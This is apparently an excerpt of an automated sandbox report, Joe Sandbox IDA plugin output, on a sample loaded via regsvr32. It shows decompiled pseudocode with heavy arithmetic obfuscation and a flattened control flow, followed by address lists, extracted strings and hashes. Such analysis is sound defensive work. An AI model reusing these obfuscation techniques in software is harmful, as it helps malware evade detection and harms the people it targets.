				_v2924 = _v2924 ^ 0xafdce921;
				_v2840 = 0x98b351;
				_v2840 = _v2840 << 0xe;
				_v2840 = _v2840 + 0x39e2;
				_v2840 = _v2840 ^ 0x2cd1b69a;
				_v2648 = 0xefee4b;
				_v2648 = _v2648 + 0xffff46f9;
				_v2648 = _v2648 ^ 0x00ec21a4;
				_v2848 = 0xd96457;
				_v2848 = _v2848 * 0x6c;
				_v2848 = _v2848 ^ 0xa04c0af4;
				_v2848 = _v2848 ^ 0xfbfff8f9;
				_v2856 = 0xd54255;
				_t775 = 0x29;
				_v2856 = _v2856 / _t775;
				_v2856 = _v2856 + 0x5db9;
				_v2856 = _v2856 ^ 0x00024640;
				_v2780 = 0x684df0;
				_v2780 = _v2780 ^ 0x2cfc36b9;
				_v2780 = _v2780 + 0xffffad37;
				_v2780 = _v2780 ^ 0x2c920bcc;
				_v2664 = 0x93e9a1;
				_v2664 = _v2664 ^ 0xb0758ee6;
				_v2664 = _v2664 ^ 0xb0e547c8;
				_v2692 = 0xe0a4a1;
				_v2692 = _v2692 << 0x10;
				_v2692 = _v2692 ^ 0xa4a3a3bd;
				_v2820 = 0x53ca07;
				_t776 = 0x38;
				_v2820 = _v2820 / _t776;
				_v2820 = _v2820 ^ 0x69a52d4a;
				_v2820 = _v2820 ^ 0x69a742e5;
				_v2768 = 0x45adf5;
				_t777 = 0x28;
				_v2768 = _v2768 / _t777;
				_t778 = 0x33;
				_v2768 = _v2768 * 0x6f;
				_v2768 = _v2768 ^ 0x00c7348a;
				_v2672 = 0xa3622d;
				_v2672 = _v2672 * 0x68;
				_v2672 = _v2672 ^ 0x42518aaf;
				_v2732 = 0xe7d257;
				_v2732 = _v2732 << 0xc;
				_v2732 = _v2732 ^ 0x7d2b6ce8;
				_v2908 = 0xb6fcc8;
				_v2908 = _v2908 / _t778;
				_t779 = 0x63;
				_v2908 = _v2908 * 0x4f;
				_v2908 = _v2908 / _t779;
				_v2908 = _v2908 ^ 0x0008aa55;
				_v2736 = 0xa2e201;
				_t780 = 0x24;
				_v2736 = _v2736 / _t780;
				_v2736 = _v2736 ^ 0x0004c10d;
				_v2916 = 0xc480dc;
				_v2916 = _v2916 + 0xffff6830;
				_v2916 = _v2916 << 0xc;
				_v2916 = _v2916 >> 3;
				_v2916 = _v2916 ^ 0x07d4cd30;
				_v2744 = 0x29dac5;
				_v2744 = _v2744 + 0xffff883e;
				_v2744 = _v2744 ^ 0x002f91a3;
				_v2868 = 0xe49a6a;
				_v2868 = _v2868 + 0xb047;
				_v2868 = _v2868 ^ 0x5e8c4957;
				_v2868 = _v2868 * 0x36;
				_v2868 = _v2868 ^ 0xea21adfb;
				_t731 = E040F1F6D(_t780);
				_t860 = _v2744;
				_t761 = _t731;
				goto L1;
				do {
					while(1) {
						L1:
						_t874 = _t861 - 0x6dbb171;
						if(_t874 > 0) {
							break;
						}
						if(_t874 == 0) {
							E040F2B09(_v2908, _v2636, _v2736, _v2916);
							_pop(_t783);
							_t861 = 0x240e9e1;
							continue;
						} else {
							if(_t861 == 0xb8f10d) {
								_push(_v2872);
								_push(_v2932);
								_push(_v2812);
								_t865 = E040EE1F8(0x40d19bc, _v2684, __eflags);
								E040F44AD(_v2676, __eflags, _v2656,  &_v1044,  &_v2604, _v2804, _v2760, _t865,  &_v524, _t860, _v2924);
								_t783 = _t865;
								E040EFECB(_t783, _v2840, _v2648, _v2848, _v2856);
								_t868 =  &(_t868[0xf]);
								_t861 = 0x1618198;
								continue;
							} else {
								if(_t861 == 0x1618198) {
									_push(_t783);
									_t783 = _v2780;
									_t743 = E040E85FF(_t783, _v2664, __eflags, 0,  &_v1044, 0, _v2692, 1, _v2820);
									_t868 =  &(_t868[7]);
									_t861 = 0x2876e66;
									continue;
								} else {
									if(_t861 == 0x1d2207b) {
										E040F0DB1(_v2852,  &_v2084, __eflags, _v2896, _t783, _v2928);
										 *((short*)(E040E09DD(_v2740,  &_v2084, _v2844, _v2796))) = 0;
										E040DBAA9(_v2668, _v2772, __eflags, _v2880, _v2920,  &_v1564);
										_push(_v2912);
										_push(_v2724);
										_push(_v2836);
										E040F2D0A(_v2752, __eflags,  &_v1564, _v2828, _v2788, _v2888, 0x40d188c,  &_v2604,  &_v2084, E040EE1F8(0x40d188c, _v2640, __eflags));
										E040EFECB(_t748, _v2644, _v2904, _v2708, _v2660);
										_t868 =  &(_t868[0x16]);
										_t743 = E040DBFBE( &_v2604, _t867, _v2700);
										_pop(_t783);
										__eflags = _t743;
										if(__eflags != 0) {
											_t861 = 0xf749c26;
											continue;
										}
									} else {
										if(_t861 == 0x240e9e1) {
											return E040F1538(_v2744, _v2868, _v2628);
										}
										if(_t861 != 0x2876e66) {
											goto L25;
										} else {
											_t743 = E040F2B09(_v2768, _t860, _v2672, _v2732);
											_pop(_t783);
											_t861 = 0x6dbb171;
											continue;
										}
										L29:
									}
								}
							}
						}
						L28:
						return _t743;
						goto L29;
					}
					__eflags = _t861 - 0x9e42b00;
					if(_t861 == 0x9e42b00) {
						_t732 = E040F0A64(_v2632, _v2636, _v2876, _v2748);
						_t860 = _t732;
						_pop(_t783);
						__eflags = _t732;
						if(__eflags == 0) {
							_t861 = 0x6dbb171;
							goto L25;
						} else {
							_t861 = 0xb8f10d;
							goto L1;
						}
						goto L29;
					} else {
						__eflags = _t861 - 0xa108a7f;
						if(_t861 == 0xa108a7f) {
							_t659 =  &_v2756; // 0x33367e
							_t733 = E040ED8DB( &_v2628,  &_v2636,  *_t659, _v2680);
							asm("sbb esi, esi");
							_pop(_t783);
							_t861 = ( ~_t733 & 0x07a3411f) + 0x240e9e1;
							goto L1;
						} else {
							__eflags = _t861 - 0xbf2cce3;
							if(_t861 == 0xbf2cce3) {
								_t653 =  &_v2764; // 0x33367e
								_t783 = _v2688;
								E040D1A34(_t783,  &_v524, _t783, _t783, _v2884, _v2696,  *_t653, _t783, _v2776, _v2784);
								_t868 =  &(_t868[8]);
								_t861 = 0x1d2207b;
								goto L1;
							} else {
								__eflags = _t861 - 0xf749c26;
								if(_t861 != 0xf749c26) {
									goto L25;
								} else {
									_v2624 = E040E0CF9();
									_t758 = E040E00C5(_t757, _v2824, _v2832);
									_pop(_t804);
									_v2620 = 2 + _t758 * 2;
									_t783 = _v2792;
									_t743 = E040DF726(_t783, _v2704, _v2864, _t761, _v2712, _t761, _t761, _v2808, _t804,  &_v2628, _v2720, _v2816, _t804, _v2728);
									_t868 =  &(_t868[0xc]);
									__eflags = _t743;
									if(__eflags != 0) {
										_t861 = 0xa108a7f;
										goto L1;
									}
								}
							}
						}
					}
					goto L28;
					L25:
					__eflags = _t861 - 0x7aa6196;
				} while (__eflags != 0);
				return _t743;
			}

0x040da871
0x040da877
0x040da881
0x040da889
0x040da894
0x040da89f
0x040da8aa
0x040da8b5
0x040da8c0
0x040da8cb
0x040da8d6
0x040da8e1
0x040da8ec
0x040da8f7
0x040da902
0x040da90d
0x040da918
0x040da923
0x040da92b
0x040da938
0x040da93c
0x040da943
0x040da94a
0x040da94d
0x040da951
0x040da959
0x040da96f
0x040da976
0x040da981
0x040da98c
0x040da997
0x040da99f
0x040da9aa
0x040da9bc
0x040da9c1
0x040da9ca
0x040da9d5
0x040da9e0
0x040da9e8
0x040da9f0
0x040da9f8
0x040daa00
0x040daa08
0x040daa0d
0x040daa17
0x040daa18
0x040daa1c
0x040daa24
0x040daa2c
0x040daa34
0x040daa39
0x040daa41
0x040daa49
0x040daa54
0x040daa5f
0x040daa6a
0x040daa72
0x040daa80
0x040daa84
0x040daa8c
0x040daa97
0x040daaad
0x040daab2
0x040daabb
0x040daac6
0x040daad8
0x040daadd
0x040daae6
0x040daaf1
0x040daafc
0x040dab04
0x040dab0c
0x040dab17
0x040dab23
0x040dab28
0x040dab2e
0x040dab3b
0x040dab3c
0x040dab40
0x040dab48
0x040dab55
0x040dab59
0x040dab61
0x040dab66
0x040dab6e
0x040dab79
0x040dab84
0x040dab8f
0x040dab97
0x040dab9f
0x040daba4
0x040dabac
0x040dabbf
0x040dabc6
0x040dabd1
0x040dabd9
0x040dabde
0x040dabe6
0x040dabea
0x040dabf2
0x040dabfd
0x040dac08
0x040dac13
0x040dac27
0x040dac2e
0x040dac39
0x040dac44
0x040dac4c
0x040dac59
0x040dac5d
0x040dac65
0x040dac70
0x040dac7b
0x040dac86
0x040dac91
0x040dac99
0x040daca1
0x040dacab
0x040dacaf
0x040dacb7
0x040dacc2
0x040daccd
0x040dacd8
0x040dace9
0x040dacec
0x040dacf0
0x040dacf5
0x040dacfd
0x040dad05
0x040dad10
0x040dad1b
0x040dad26
0x040dad31
0x040dad3c
0x040dad47
0x040dad52
0x040dad5d
0x040dad68
0x040dad7b
0x040dad82
0x040dad8d
0x040dad95
0x040dad9d
0x040dada5
0x040dadaa
0x040dadb2
0x040dadba
0x040dadc2
0x040dadca
0x040dadd2
0x040dade8
0x040dadf7
0x040dadfa
0x040dae01
0x040dae0c
0x040dae14
0x040dae19
0x040dae21
0x040dae29
0x040dae34
0x040dae3f
0x040dae4a
0x040dae55
0x040dae5d
0x040dae6a
0x040dae6e
0x040dae76
0x040dae89
0x040dae90
0x040dae9b
0x040daeae
0x040daebd
0x040daec4
0x040daecf
0x040daeda
0x040daee5
0x040daef0
0x040daf04
0x040daf0b
0x040daf16
0x040daf21
0x040daf2c
0x040daf37
0x040daf42
0x040daf57
0x040daf65
0x040daf6a
0x040daf73
0x040daf7e
0x040daf89
0x040daf91
0x040daf9c
0x040dafa8
0x040dafad
0x040dafb3
0x040dafbb
0x040dafc3
0x040dafcb
0x040dafdd
0x040dafe0
0x040dafe7
0x040daff2
0x040daffd
0x040db010
0x040db017
0x040db022
0x040db02d
0x040db035
0x040db040
0x040db04b
0x040db058
0x040db05c
0x040db064
0x040db069
0x040db071
0x040db079
0x040db086
0x040db08a
0x040db08f
0x040db097
0x040db09f
0x040db0a7
0x040db0af
0x040db0b7
0x040db0c2
0x040db0ca
0x040db0d5
0x040db0e0
0x040db0e8
0x040db0f3
0x040db0fe
0x040db10e
0x040db115
0x040db120
0x040db133
0x040db13a
0x040db142
0x040db14d
0x040db155
0x040db159
0x040db161
0x040db169
0x040db171
0x040db176
0x040db17e
0x040db186
0x040db191
0x040db19c
0x040db1a7
0x040db1b4
0x040db1b8
0x040db1c0
0x040db1ca
0x040db1d8
0x040db1dd
0x040db1e3
0x040db1eb
0x040db1f3
0x040db1fe
0x040db209
0x040db214
0x040db21f
0x040db22a
0x040db235
0x040db240
0x040db24b
0x040db253
0x040db25e
0x040db270
0x040db275
0x040db27e
0x040db289
0x040db294
0x040db2a6
0x040db2ab
0x040db2bc
0x040db2bf
0x040db2c6
0x040db2d1
0x040db2e4
0x040db2eb
0x040db2f6
0x040db301
0x040db309
0x040db314
0x040db324
0x040db32d
0x040db330
0x040db33c
0x040db340
0x040db348
0x040db35a
0x040db35d
0x040db364
0x040db36f
0x040db377
0x040db37f
0x040db384
0x040db389
0x040db391
0x040db39c
0x040db3a7
0x040db3b2
0x040db3ba
0x040db3c2
0x040db3cf
0x040db3d3
0x040db3e2
0x040db3e7
0x040db3ee
0x040db3ee
0x040db3f0
0x040db3f0
0x040db3f0
0x040db3f0
0x040db3f6
0x00000000
0x00000000
0x040db3fc
0x040db668
0x040db66e
0x040db66f
0x00000000
0x040db402
0x040db408
0x040db5b7
0x040db5c0
0x040db5c4
0x040db5da
0x040db61d
0x040db629
0x040db640
0x040db645
0x040db648
0x00000000
0x040db40e
0x040db414
0x040db57a
0x040db599
0x040db5a5
0x040db5aa
0x040db5ad
0x00000000
0x040db41a
0x040db420
0x040db473
0x040db49b
0x040db4bc
0x040db4c9
0x040db4cd
0x040db4d4
0x040db523
0x040db543
0x040db548
0x040db561
0x040db567
0x040db568
0x040db56a
0x040db570
0x00000000
0x040db570
0x040db422
0x040db428
0x00000000
0x040db814
0x040db434
0x00000000
0x040db43a
0x040db451
0x040db457
0x040db458
0x00000000
0x040db458
0x00000000
0x040db434
0x040db420
0x040db414
0x040db408
0x040db81f
0x040db81f
0x00000000
0x040db81f
0x040db679
0x040db67f
0x040db7d3
0x040db7d8
0x040db7db
0x040db7dc
0x040db7de
0x040db7ea
0x00000000
0x040db7e0
0x040db7e0
0x00000000
0x040db7e0
0x00000000
0x040db685
0x040db685
0x040db68b
0x040db78e
0x040db79c
0x040db7a6
0x040db7ae
0x040db7af
0x00000000
0x040db691
0x040db691
0x040db697
0x040db753
0x040db767
0x040db76e
0x040db773
0x040db776
0x00000000
0x040db69d
0x040db69d
0x040db6a3
0x00000000
0x040db6a9
0x040db6c3
0x040db6ca
0x040db6cf
0x040db6ed
0x040db71c
0x040db723
0x040db728
0x040db72b
0x040db72d
0x040db733
0x00000000
0x040db733
0x040db72d
0x040db6a3
0x040db697
0x040db68b
0x00000000
0x040db7ef
0x040db7ef
0x040db7ef
0x00000000

Strings

/e, xrefs: 040DABEA
l+}, xrefs: 040DB309
05, xrefs: 040DAEE5
~63, xrefs: 040DAC1E, 040DAF4D, 040DAF5E
\\, xrefs: 040DAA54
xs,, xrefs: 040DAAF1
h, xrefs: 040DABA4
B:, xrefs: 040DAC44
~63, xrefs: 040DB753
N , xrefs: 040DACB7
9, xrefs: 040DB176
BbJ, xrefs: 040DA981
$P, xrefs: 040DA936
HMJ9, xrefs: 040DAFE7
2iJ, xrefs: 040DB022
QGgf, xrefs: 040DADBA
K, xrefs: 040DB186
uv, xrefs: 040DAE55
!., xrefs: 040DAE4A

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: h$!.$$P$/e$05$2iJ$B:$BbJ$HMJ9$K$N $QGgf$\\$uv$xs,$~63$~63$9$l+}
API String ID: 0-4215899151
Opcode ID: 57d6d8bbcd609a91417a9055391dfb422038bad2b2f214ead8f6a73280a1c48e
Instruction ID: 569516ac1de0f17b94de6e7094d4124b3dbeb803c3fa065e823f07d27650ef42
Opcode Fuzzy Hash: 57d6d8bbcd609a91417a9055391dfb422038bad2b2f214ead8f6a73280a1c48e
Instruction Fuzzy Hash: 8772F0725083819FD378CF21D54AB9BBBE2BBC4348F10891DE6D996260DBB19958CF43

Uniqueness

Uniqueness Score: -1.00%

Function 040E0F86, Relevance: 23.2, Strings: 18, Instructions: 723
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E040E0F86(intOrPtr* __ecx) {
				char _v68;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr* _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				void* _t824;
				void* _t825;
				void* _t829;
				void* _t832;
				void* _t844;
				void* _t850;
				void* _t853;
				signed int _t860;
				signed int _t861;
				signed int _t862;
				signed int _t863;
				signed int _t864;
				signed int _t865;
				signed int _t866;
				signed int _t867;
				signed int _t868;
				signed int _t869;
				signed int _t870;
				signed int _t871;
				signed int _t872;
				signed int _t873;
				signed int _t874;
				signed int _t875;
				signed int _t876;
				void* _t882;
				void* _t901;
				void* _t957;
				intOrPtr _t975;
				intOrPtr* _t978;
				signed int _t980;
				signed int _t981;
				void* _t982;
				intOrPtr _t986;
				void* _t987;
				void* _t994;
				void* _t996;

				_t978 = __ecx;
				_v96 = __ecx;
				_v88 = 0xce16ef;
				_t986 = 0;
				_t853 = 0x87433f6;
				_v84 = 0;
				_v80 = 0;
				_v412 = 0xef09b0;
				_v412 = _v412 + 0xffff239a;
				_v412 = _v412 >> 0xe;
				_v412 = _v412 + 0xffffb1af;
				_v412 = _v412 ^ 0xffffb567;
				_v144 = 0xb2550e;
				_v144 = _v144 << 6;
				_v144 = _v144 ^ 0x2c954380;
				_v160 = 0xa1df5c;
				_v160 = _v160 * 0x60;
				_v160 = _v160 ^ 0x3cb3c280;
				_v288 = 0x7a32d8;
				_v288 = _v288 | 0x8c6c9666;
				_v288 = _v288 ^ 0x041f8caf;
				_v288 = _v288 ^ 0x88613a51;
				_v348 = 0xdf5e12;
				_v348 = _v348 | 0xa5ea5eb7;
				_v348 = _v348 ^ 0xa5ff5eb7;
				_v296 = 0x7009ff;
				_v296 = _v296 + 0xffff1527;
				_v296 = _v296 + 0x576a;
				_v296 = _v296 ^ 0x006f7690;
				_v372 = 0x1f54b;
				_t860 = 0x52;
				_v372 = _v372 * 0x5a;
				_v372 = _v372 >> 0xb;
				_v372 = _v372 / _t860;
				_v372 = _v372 ^ 0x00000044;
				_v332 = 0x772df1;
				_v332 = _v332 + 0x4853;
				_v332 = _v332 ^ 0x166147d5;
				_v332 = _v332 ^ 0x16163191;
				_v240 = 0x1a1abb;
				_v240 = _v240 ^ 0xbdfc81b5;
				_v240 = _v240 | 0x1ef02f35;
				_v240 = _v240 ^ 0xbff6bf3f;
				_v232 = 0x620327;
				_v232 = _v232 + 0xffffc934;
				_t861 = 0x13;
				_v232 = _v232 / _t861;
				_v232 = _v232 ^ 0x000525b3;
				_v208 = 0xe2fff2;
				_t980 = 0x39;
				_v208 = _v208 * 0x78;
				_v208 = _v208 ^ 0x6a67f970;
				_v344 = 0xf3734c;
				_v344 = _v344 >> 0x10;
				_v344 = _v344 / _t980;
				_v344 = _v344 ^ 0x00000004;
				_v300 = 0x170e40;
				_v300 = _v300 | 0xfbde795f;
				_v300 = _v300 ^ 0xfbde9330;
				_v260 = 0xd4f3ae;
				_v260 = _v260 ^ 0x9e22b963;
				_v260 = _v260 * 0x2e;
				_v260 = _v260 ^ 0x904fea8f;
				_v356 = 0x4c8d9b;
				_v356 = _v356 | 0xd47535dd;
				_v356 = _v356 + 0xffffd433;
				_t862 = 0x64;
				_v356 = _v356 * 0x59;
				_v356 = _v356 ^ 0xdfa15942;
				_v308 = 0xbd9260;
				_v308 = _v308 >> 0xe;
				_v308 = _v308 * 0x79;
				_v308 = _v308 ^ 0x000cbe7b;
				_v252 = 0xa2f51d;
				_v252 = _v252 + 0x749;
				_v252 = _v252 << 0xd;
				_v252 = _v252 ^ 0x5f854687;
				_v292 = 0x216e58;
				_v292 = _v292 / _t862;
				_v292 = _v292 + 0xffff8880;
				_v292 = _v292 ^ 0xfff3b1bc;
				_v176 = 0xac4eb4;
				_v176 = _v176 | 0xd866b52c;
				_v176 = _v176 ^ 0xd8e8b8b7;
				_v236 = 0x7a6201;
				_v236 = _v236 ^ 0x2461ec4e;
				_t863 = 0xa;
				_v236 = _v236 * 0x35;
				_v236 = _v236 ^ 0x79bb4b53;
				_v220 = 0xf5a9fb;
				_v220 = _v220 << 1;
				_v220 = _v220 >> 5;
				_v220 = _v220 ^ 0x000a39a7;
				_v380 = 0x7beff6;
				_v380 = _v380 / _t863;
				_v380 = _v380 | 0x5a206f9b;
				_v380 = _v380 * 0x3d;
				_v380 = _v380 ^ 0x7c9823d9;
				_v284 = 0xdc7201;
				_v284 = _v284 ^ 0xec4f9d75;
				_v284 = _v284 << 8;
				_v284 = _v284 ^ 0x93e140b6;
				_v396 = 0x36b797;
				_v396 = _v396 + 0x83f2;
				_v396 = _v396 | 0xb5da4ffa;
				_v396 = _v396 ^ 0x8c9f27f1;
				_v396 = _v396 ^ 0x3962cb66;
				_v364 = 0x608af6;
				_v364 = _v364 >> 0xe;
				_v364 = _v364 ^ 0xb06c2668;
				_v364 = _v364 >> 0xa;
				_v364 = _v364 ^ 0x0022b374;
				_v404 = 0xe18b1f;
				_v404 = _v404 + 0xffff49de;
				_v404 = _v404 + 0xffffa950;
				_v404 = _v404 >> 5;
				_v404 = _v404 ^ 0x000802e7;
				_v168 = 0x720eed;
				_v168 = _v168 | 0xf4577aa8;
				_v168 = _v168 ^ 0xf4704e8f;
				_v328 = 0x5e39f;
				_v328 = _v328 * 0x2a;
				_v328 = _v328 ^ 0x47860790;
				_v328 = _v328 ^ 0x47706e69;
				_v336 = 0xdd3db6;
				_v336 = _v336 ^ 0x0be1064e;
				_v336 = _v336 ^ 0xe0fa941c;
				_v336 = _v336 ^ 0xebc1ff07;
				_v340 = 0x8bacdf;
				_t864 = 0x49;
				_v340 = _v340 / _t864;
				_t865 = 0x77;
				_v340 = _v340 * 0x4d;
				_v340 = _v340 ^ 0x0099a7e7;
				_v440 = 0x29fcf0;
				_v440 = _v440 >> 4;
				_v440 = _v440 ^ 0x37539152;
				_v440 = _v440 / _t865;
				_v440 = _v440 ^ 0x007580f6;
				_v400 = 0x753dd5;
				_v400 = _v400 ^ 0x142a6b84;
				_v400 = _v400 ^ 0x6d30c2ad;
				_v400 = _v400 ^ 0xe014bebf;
				_v400 = _v400 ^ 0x997c2220;
				_v128 = 0x8b3cd;
				_v128 = _v128 << 2;
				_v128 = _v128 ^ 0x002b9a55;
				_v408 = 0x5fd2f;
				_v408 = _v408 >> 9;
				_t866 = 0x69;
				_v408 = _v408 * 0x53;
				_v408 = _v408 * 0x58;
				_v408 = _v408 ^ 0x00501640;
				_v416 = 0x7e5e32;
				_v416 = _v416 | 0x37c3b1cb;
				_v416 = _v416 + 0x4e4b;
				_v416 = _v416 | 0xc7e68b70;
				_v416 = _v416 ^ 0xffec3e94;
				_v304 = 0xac72e0;
				_v304 = _v304 + 0xffff9516;
				_v304 = _v304 | 0x0ab72207;
				_v304 = _v304 ^ 0x0aba1474;
				_v424 = 0x91a63a;
				_v424 = _v424 | 0xeda6ffa9;
				_v424 = _v424 ^ 0xa7761782;
				_v424 = _v424 << 0xe;
				_v424 = _v424 ^ 0x7a08e30a;
				_v436 = 0x9e7f8b;
				_v436 = _v436 | 0x84ca61f6;
				_v436 = _v436 << 2;
				_v436 = _v436 * 0x3e;
				_v436 = _v436 ^ 0xb78cfbfa;
				_v216 = 0x303808;
				_v216 = _v216 + 0xef78;
				_v216 = _v216 / _t980;
				_v216 = _v216 ^ 0x000455e2;
				_v312 = 0x19b522;
				_v312 = _v312 << 7;
				_v312 = _v312 ^ 0x11162953;
				_v312 = _v312 ^ 0x1dcfd305;
				_v212 = 0x8a6fc0;
				_v212 = _v212 << 9;
				_v212 = _v212 ^ 0x14d4ca12;
				_v276 = 0xdb7845;
				_v276 = _v276 / _t866;
				_v276 = _v276 * 0x1c;
				_v276 = _v276 ^ 0x003237f1;
				_v124 = 0x91e545;
				_t867 = 0x7b;
				_v124 = _v124 / _t867;
				_v124 = _v124 ^ 0x0004745c;
				_v192 = 0x2154b3;
				_v192 = _v192 ^ 0x5324a52c;
				_v192 = _v192 ^ 0x530d1a47;
				_v140 = 0x7913eb;
				_v140 = _v140 | 0xe487e648;
				_v140 = _v140 ^ 0xe4fd51cb;
				_v428 = 0x8a554f;
				_v428 = _v428 << 1;
				_v428 = _v428 + 0xffff493d;
				_v428 = _v428 | 0x8f4663f4;
				_v428 = _v428 ^ 0x8f592165;
				_v200 = 0x5c4830;
				_v200 = _v200 + 0xffffe35d;
				_v200 = _v200 ^ 0x00549f8c;
				_v132 = 0x6e2e79;
				_t377 =  &_v132; // 0x6e2e79
				_t981 = 0x62;
				_v132 =  *_t377 / _t981;
				_v132 = _v132 ^ 0x000a369f;
				_v244 = 0x1d0d9a;
				_t868 = 0x6e;
				_v244 = _v244 / _t868;
				_v244 = _v244 ^ 0xec9a9004;
				_v244 = _v244 ^ 0xec94e609;
				_v148 = 0xd4a92;
				_v148 = _v148 + 0xffffbc3f;
				_v148 = _v148 ^ 0x00088ca7;
				_v184 = 0x3666a0;
				_v184 = _v184 >> 0xb;
				_v184 = _v184 ^ 0x00096f18;
				_v228 = 0x713966;
				_v228 = _v228 << 3;
				_v228 = _v228 << 0xb;
				_v228 = _v228 ^ 0x4e5b426e;
				_v316 = 0xec09e9;
				_v316 = _v316 << 7;
				_t869 = 0x78;
				_v316 = _v316 / _t869;
				_v316 = _v316 ^ 0x00fe5880;
				_v268 = 0x8ffe81;
				_v268 = _v268 + 0xffff4311;
				_v268 = _v268 ^ 0x56e15418;
				_v268 = _v268 ^ 0x566a144b;
				_v324 = 0x9f4c2e;
				_v324 = _v324 >> 4;
				_v324 = _v324 | 0x903f3b4d;
				_v324 = _v324 ^ 0x9031b6d7;
				_v196 = 0x6080cf;
				_v196 = _v196 << 0xe;
				_v196 = _v196 ^ 0x203ba000;
				_v256 = 0x4bba45;
				_v256 = _v256 + 0xc17c;
				_v256 = _v256 | 0x95e268b8;
				_v256 = _v256 ^ 0x95e68234;
				_v264 = 0x7821fc;
				_v264 = _v264 << 3;
				_t870 = 0x34;
				_v264 = _v264 / _t870;
				_v264 = _v264 ^ 0x001694e5;
				_v204 = 0x96f3a5;
				_v204 = _v204 * 0x24;
				_v204 = _v204 ^ 0x153e3a4b;
				_v368 = 0xbef911;
				_t871 = 0xe;
				_v368 = _v368 / _t871;
				_v368 = _v368 >> 0xb;
				_v368 = _v368 + 0x5de4;
				_v368 = _v368 ^ 0x00021c01;
				_v376 = 0x377d04;
				_v376 = _v376 + 0xcef;
				_v376 = _v376 ^ 0x9e466b70;
				_t872 = 0x59;
				_v376 = _v376 * 0x6b;
				_v376 = _v376 ^ 0x399834bf;
				_v180 = 0x6632ea;
				_v180 = _v180 | 0x3a3e38fd;
				_v180 = _v180 ^ 0x3a73a81b;
				_v248 = 0x142cd9;
				_v248 = _v248 / _t872;
				_v248 = _v248 / _t981;
				_v248 = _v248 ^ 0x0001d965;
				_v188 = 0x88b8e9;
				_v188 = _v188 + 0xffff5f5f;
				_v188 = _v188 ^ 0x0087927e;
				_v164 = 0x9c013d;
				_t873 = 0xa;
				_v164 = _v164 / _t873;
				_v164 = _v164 ^ 0x0004ead6;
				_v172 = 0x53b5f1;
				_v172 = _v172 + 0xd9f2;
				_v172 = _v172 ^ 0x005588af;
				_v360 = 0xd6ac8a;
				_v360 = _v360 | 0xfdf9fa5f;
				_v360 = _v360 ^ 0xfdfecc4d;
				_v224 = 0xfb951e;
				_v224 = _v224 + 0xffff2e4c;
				_v224 = _v224 + 0x8dcd;
				_v224 = _v224 ^ 0x00f1d24a;
				_v272 = 0x6e5d6f;
				_v272 = _v272 << 2;
				_t874 = 0x6f;
				_v272 = _v272 / _t874;
				_v272 = _v272 ^ 0x000d7a86;
				_v384 = 0x15dc31;
				_v384 = _v384 + 0xfffffc55;
				_v384 = _v384 << 0x10;
				_v384 = _v384 >> 0xa;
				_v384 = _v384 ^ 0x003c4753;
				_v392 = 0x7bc513;
				_v392 = _v392 * 0x54;
				_v392 = _v392 | 0xe01c3b63;
				_v392 = _v392 + 0xe1b2;
				_v392 = _v392 ^ 0xe89c6b16;
				_v420 = 0x6862b7;
				_v420 = _v420 ^ 0x841c6550;
				_v420 = _v420 + 0xd52;
				_v420 = _v420 >> 0x10;
				_v420 = _v420 ^ 0x000e8d54;
				_v388 = 0x19484a;
				_t982 = 0x6f661e6;
				_t875 = 0x68;
				_v388 = _v388 / _t875;
				_t876 = 0xd;
				_v92 = 0x100;
				_v388 = _v388 * 0x61;
				_v388 = _v388 << 6;
				_v388 = _v388 ^ 0x05e5c873;
				_v432 = 0xb160;
				_v432 = _v432 * 0x78;
				_v432 = _v432 >> 8;
				_v432 = _v432 ^ 0xee0de4a9;
				_v432 = _v432 ^ 0xee0e3c37;
				_v320 = 0x436488;
				_v320 = _v320 * 0x7d;
				_v320 = _v320 * 0x24;
				_v320 = _v320 ^ 0xa0a81f1c;
				_v136 = 0x73af31;
				_v136 = _v136 >> 0xf;
				_v136 = _v136 ^ 0x0004ab53;
				_v120 = 0xd23217;
				_v120 = _v120 | 0x86b48086;
				_v120 = _v120 ^ 0x86fe303d;
				_v280 = 0x567562;
				_v280 = _v280 / _t876;
				_v280 = _v280 + 0xffff7ef5;
				_v280 = _v280 ^ 0x00098751;
				_v152 = 0x24c9f6;
				_v152 = _v152 + 0x7f22;
				_v152 = _v152 ^ 0x002f2944;
				_v156 = 0xe548b;
				_v156 = _v156 + 0xe219;
				_v156 = _v156 ^ 0x000a95de;
				_v352 = 0xccf4e9;
				_v352 = _v352 | 0x0ed71748;
				_v352 = _v352 + 0xefd9;
				_v352 = _v352 << 3;
				_v352 = _v352 ^ 0x770f1835;
